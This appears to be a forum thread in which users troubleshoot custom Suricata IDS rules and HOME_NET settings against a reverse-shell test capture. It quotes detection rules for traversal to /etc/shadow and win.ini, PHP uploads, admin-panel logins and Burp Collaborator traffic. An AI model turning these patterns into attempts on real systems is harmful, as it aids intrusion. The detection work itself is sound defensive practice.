26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: system file requested in traversal"; flow: to_server,established; content: "../../"; http_raw_uri; pcre: "/etc\/shadow|win\.ini|boot\.ini/Ui"; flowbits: isnotset, IDPS_SYSTRAV; flowbits: set, IDPS_SYSTRAV; sid:3174047; rev:1; classtype: web-application-attack; metadata: created_at 2020_09_17, updated_at 2020_02_13, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: phpMyAdmin login attempt (noalert)"; flow: to_server,established; content: "POST"; http_method; content: "index.php"; nocase; http_uri; content: "pma_username|3d|"; http_client_body; content: "pma_password|3d|"; http_client_body; flowbits: isnotset, IDPS_PMA_LOGIN; flowbits: set, IDPS_PMA_LOGIN; flowbits: noalert; sid:3174048; rev:1; classtype: web-application-attack; metadata: created_at 2020_09_17, updated_at 2020_09_17, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: phpMyAdmin login success"; flow: from_server,established; flowbits: isset, IDPS_PMA_LOGIN; content: "302"; http_stat_code; content: "Set-Cookie|3a| "; flowbits: unset, IDPS_PMA_LOGIN; sid:3174049; rev:1; classtype: web-application-attack; metadata: created_at 2020_09_17, updated_at 2020_09_17, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: phpMyAdmin login failed"; flow: from_server,established; flowbits: isset, IDPS_PMA_LOGIN; content: !"302"; http_stat_code; flowbits: unset, IDPS_PMA_LOGIN; sid:3174050; rev:1; classtype: web-application-attack; metadata: created_at 2020_09_17, updated_at 2020_09_17, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: Opencart login attempt (noalert)"; flow: to_server,established; content: "POST"; http_method; content: "/admin/"; nocase; http_uri; content: "Content-Type|3a 20|multipart/form-data|3b 20|boundary="; http_header; content: "username"; http_client_body; content: "password"; http_client_body; flowbits: isnotset, IDPS_OCART_LOGIN; flowbits: set, IDPS_OCART_LOGIN; flowbits: noalert; sid:3174101; rev:1; classtype: web-application-attack; metadata: created_at 2020_09_24, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Opencart login failed"; flow: from_server,established; flowbits: isset, IDPS_OCART_LOGIN; content: !"302"; http_stat_code; flowbits: unset, IDPS_OCART_LOGIN; sid:3174102; rev:1; classtype: web-application-attack; metadata: created_at 2020_09_24, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Opencart login success"; flow: from_server,established; flowbits: isset, IDPS_OCART_LOGIN; content: "302"; http_stat_code; content: "Set-Cookie|3a|"; flowbits: unset, IDPS_OCART_LOGIN; sid:3174103; rev:1; classtype: web-application-attack; metadata: created_at 2020_09_24, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: phpMyAdmin recon (noalert)"; flow: to_server,established; content: "/phpmyadmin"; http_uri; nocase; fast_pattern; flowbits: isnotset, IDPS_PMA_RECON; flowbits: set, IDPS_PMA_RECON; flowbits: noalert; sid:3174303; rev:1; classtype: web-application-attack; metadata: created_at 2020_10_12, updated_at 2020_09_17, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: phpMyAdmin recon failed"; flow: from_server,established; flowbits: isset, IDPS_PMA_RECON; content: !"20"; http_stat_code; offset: 0; depth: 2; content: !"30"; http_stat_code; offset: 0; depth: 2; flowbits: unset, IDPS_PMA_RECON; sid:3174304; rev:1; classtype: web-application-attack; metadata: created_at 2020_10_12, updated_at 2020_09_17, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: phpMyAdmin pma recon (noalert)"; flow: to_server,established; content: "/pma"; http_uri; nocase; fast_pattern; flowbits: isnotset, IDPS_PMA_RECON; flowbits: set, IDPS_PMA_RECON; flowbits: noalert; sid:3174305; rev:1; classtype: web-application-attack; metadata: created_at 2020_10_12, updated_at 2020_09_17, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: PHP file upload attempt"; flow: to_server,established; content: "POST"; http_method; content: "Content-Type|3a 20|multipart/form-data|3b 20|boundary="; http_header; content: "filename="; http_client_body; pcre: "/\.php.?['\"]\v/PRi"; sid:3174421; rev:1; classtype: web-application-attack; metadata: created_at 2020_10_20, updated_at 2020_09_17, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: open directory response"; flow: from_server,established; content: "<title>Index of /"; nocase; threshold: type limit, track by_dst, seconds 10, count 1; sid:3174422; rev:1; classtype: web-application-attack; metadata: created_at 2020_10_20, updated_at 2020_09_17, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: base64 encoded PHP tags"; flow: established,to_server; content: "PD9waHAg"; sid:3174423; rev:1; classtype: web-application-attack; metadata: created_at 2020_10_20, updated_at 2020_09_17, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http !$HOME_NET any -> $HTTP_SERVERS any (msg:"IDPS: IP address in Host header"; flow: established,to_server; content: "."; http_host;offset: 1;depth: 3; content: "."; http_host;within: 4; content: "."; http_host;within: 4; pcre: "/^(?:\d{1,3}\.){3}\d{1,3}$/W"; flowbits: isnotset, IDPS_IP_HOST; flowbits: set, IDPS_IP_HOST; sid:3174437; rev:1; classtype: web-application-attack; metadata: created_at 2020_10_21, updated_at 2020_09_16, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: request to dotfile"; flow: to_server,established; content: "/."; http_raw_uri; pcre: !"/\//IR"; flowbits: isnotset, IDPS_DOTFILE; flowbits: set, IDPS_DOTFILE; sid:3178842; rev:1; classtype: web-application-attack; metadata: created_at 2021_02_05, updated_at 2021_02_05, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: burp suite activity in Host header"; flow: established,to_server; content: "burpcollaborator.net"; http_host; sid:3178843; rev:1; classtype: web-application-attack; metadata: created_at 2021_02_05, updated_at 2021_02_05, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: dotfile not found"; flow: from_server,established; flowbits: isset, IDPS_DOTFILE; content: !"20"; http_stat_code; offset: 0; depth: 2; flowbits: unset, IDPS_DOTFILE; sid:3178909; rev:1; classtype: web-application-attack; metadata: created_at 2021_02_08, updated_at 2021_02_05, affected_product Web_Server_Applications; )"

Yes, because it is not TLS event, just connection to my netcat listener on port 443

I am not sure what suricata-update does with that file that it fails. I tested it following way:

suricata -k none -v -c suricata.yaml -S idps_rules.txt -r reverse_shell_tls.pcap -l /tmp/log/

This needs to have your test IP in $HOME_NET in suricata.yaml for rules to trigger.

And this is weird because I don’t know where I got that 2610004 rule from, it just seems to be in my /etc/suricata/rules/suricata.rules file. Checked other distros I have suricata on, and none of them has this file. Weird.

I tried exactly as you did and I did not get any alert…
Don’t know why it does not work.
I have suricata out of the box, only configured interfaces to listen on and updated rulesets…
Output below:

root@ubuntu:/etc/suricata/rules# suricata -k none -v -c ../suricata.yaml -S idps.txt -r /home/ubuntu/Downloads/reverse_shell_tls.pcap
26/8/2021 -- 13:49:28 - <Notice> - This is Suricata version 6.0.3 RELEASE running in USER mode
26/8/2021 -- 13:49:28 - <Info> - CPUs/cores online: 2
26/8/2021 -- 13:49:28 - <Info> - fast output device (regular) initialized: fast.log
26/8/2021 -- 13:49:28 - <Info> - eve-log output device (regular) initialized: eve.json
26/8/2021 -- 13:49:28 - <Info> - stats output device (regular) initialized: stats.log
26/8/2021 -- 13:49:28 - <Info> - 1 rule files processed. 65 rules successfully loaded, 0 rules failed
26/8/2021 -- 13:49:28 - <Info> - Threshold config parsed: 0 rule(s) found
26/8/2021 -- 13:49:28 - <Info> - 65 signatures processed. 0 are IP-only rules, 17 are inspecting packet payload, 48 inspect application layer, 0 are decoder event only
26/8/2021 -- 13:49:28 - <Notice> - all 3 packet processing threads, 4 management threads initialized, engine started.
26/8/2021 -- 13:49:28 - <Info> - Starting file run for /home/ubuntu/Downloads/reverse_shell_tls.pcap
26/8/2021 -- 13:49:28 - <Info> - pcap file /home/ubuntu/Downloads/reverse_shell_tls.pcap end of file reached (pcap err code 0)
26/8/2021 -- 13:49:28 - <Notice> - Signal Received.  Stopping engine.
26/8/2021 -- 13:49:28 - <Info> - time elapsed 0.085s
26/8/2021 -- 13:49:28 - <Notice> - Pcap-file module read 1 files, 24 packets, 2502 bytes
26/8/2021 -- 13:49:28 - <Info> - Alerts: 0
26/8/2021 -- 13:49:28 - <Info> - cleaning up signature grouping structure... complete

Did you change $HOME_NET variable in suricata.yaml to the IP address of server in pcap file? That is all that’s required to get those rule match something in pcap mode. If that doesn’t work, try ‘any’ as HOME_NET variable value. Sadly Suricata is far from trivial to operate, but once you get there - it’s worth it.

Hi @h0llym0lly !

TLS detection is done on 443 by Suricata as it is a standard port for this proto (and a few other checks are also performed). The sni in your TLS event indicates that this is an event corresponding to a request being made to ubuntu.tests.com. Are you or a process on your system making this request? I feel that there is a lot of elaborate info in this event for this to not be an actual tls event. e.g. the TLS version, JA3 hash which is only extracted/calculated from a TLS packet header. Are you sure there is no other traffic on this port?
Please let me know if you have a strong reason to believe it is still a misdetection.

About detecting traffic that you want to, you can do a live capture on the interface or port w wireshark or tcpdump. Look for the outliers (that you expect are weird packets and should alert) and create a rule based on the information in those packets.

Yes I did. Thats my $HOME_NET config:

HOME_NET: "[192.168.184.0/24,10.4.4.0/24]"

So I attacked 192.168.184.130 from 192.168.184.132.
According to your answer it should works as only $HOME_NET and interface settings need to be changed.
But unfortunatelly it does not :(.
I need to fix this until monday, but cant figure out why it wont work.

Cant set “any” in $HOME_NET:

26/8/2021 -- 15:01:21 - <Notice> - This is Suricata version 6.0.3 RELEASE running in USER mode
26/8/2021 -- 15:01:21 - <Info> - CPUs/cores online: 2
26/8/2021 -- 15:01:22 - <Error> - [ERRCODE: SC_ERR_INVALID_YAML_CONF_ENTRY(139)] - address var - "EXTERNAL_NET" has the complete IP space negated with its value "!$HOME_NET".  Rule address range is NIL. Probably have a !any or an address range that supplies a NULL address range
26/8/2021 -- 15:01:22 - <Error> - [ERRCODE: SC_ERR_INVALID_YAML_CONF_ENTRY(139)] - basic address vars test failed. Please check suricata.yaml for errors

I know why it doesn’t work. You have $HOME_NET as two networks defined - 192.168.184.0/24,10.4.4.0/24 and $EXTERNAL_NET as !$HOME_NET which means any machine not in your $HOME_NET. If we look at the rule we are trying to trigger it has ‘alert http $EXTERNAL_NET any → $HTTP_SERVERS’ which means it will only trigger coming not from your $HOME_NET to your $HOME_NET. But traffic in your pcap file is between servers in your $HOME_NET machines .132 to .130. Basically it means these rules trigger coming from the internet to your home network, not between home network machines. Either change HOME_NET, EXTERNAL_NET accordingly or edit rules to trigger between local machines. Best of luck!

Still does not work. I was changing EXTERNAL_NET to “any”, “$HOME_NET” (without exclamation mark).
Changed rule:

alert http $HOME_NET any -> $HTTP_SERVERS any (msg:"IDPS: base64 encoded PHP tags"; flow: established,to_server; content: "PD9waHAg"; sid:3174423; rev:1; classtype: web-application-attack; metadata: created_at 2020_10_20, updated_at 2020_09_17, affected_product Web_Server_Applications;)

Still no success.

27/8/2021 -- 10:18:00 - <Notice> - This is Suricata version 6.0.3 RELEASE running in USER mode
27/8/2021 -- 10:18:00 - <Info> - CPUs/cores online: 2
27/8/2021 -- 10:18:00 - <Info> - fast output device (regular) initialized: fast.log
27/8/2021 -- 10:18:00 - <Info> - eve-log output device (regular) initialized: eve.json
27/8/2021 -- 10:18:00 - <Info> - stats output device (regular) initialized: stats.log
27/8/2021 -- 10:18:00 - <Info> - 1 rule files processed. 65 rules successfully loaded, 0 rules failed
27/8/2021 -- 10:18:00 - <Info> - Threshold config parsed: 0 rule(s) found
27/8/2021 -- 10:18:00 - <Info> - 65 signatures processed. 0 are IP-only rules, 17 are inspecting packet payload, 48 inspect application layer, 0 are decoder event only
27/8/2021 -- 10:18:00 - <Notice> - all 3 packet processing threads, 4 management threads initialized, engine started.
27/8/2021 -- 10:18:00 - <Info> - Starting file run for /home/ubuntu/Downloads/reverse_shell_tls.pcap
27/8/2021 -- 10:18:00 - <Info> - pcap file /home/ubuntu/Downloads/reverse_shell_tls.pcap end of file reached (pcap err code 0)
27/8/2021 -- 10:18:00 - <Notice> - Signal Received.  Stopping engine.
27/8/2021 -- 10:18:00 - <Info> - time elapsed 0.047s
27/8/2021 -- 10:18:00 - <Notice> - Pcap-file module read 1 files, 24 packets, 2502 bytes
27/8/2021 -- 10:18:00 - <Info> - Alerts: 1
27/8/2021 -- 10:18:00 - <Info> - cleaning up signature grouping structure... complete

It’s working, check fast.log file.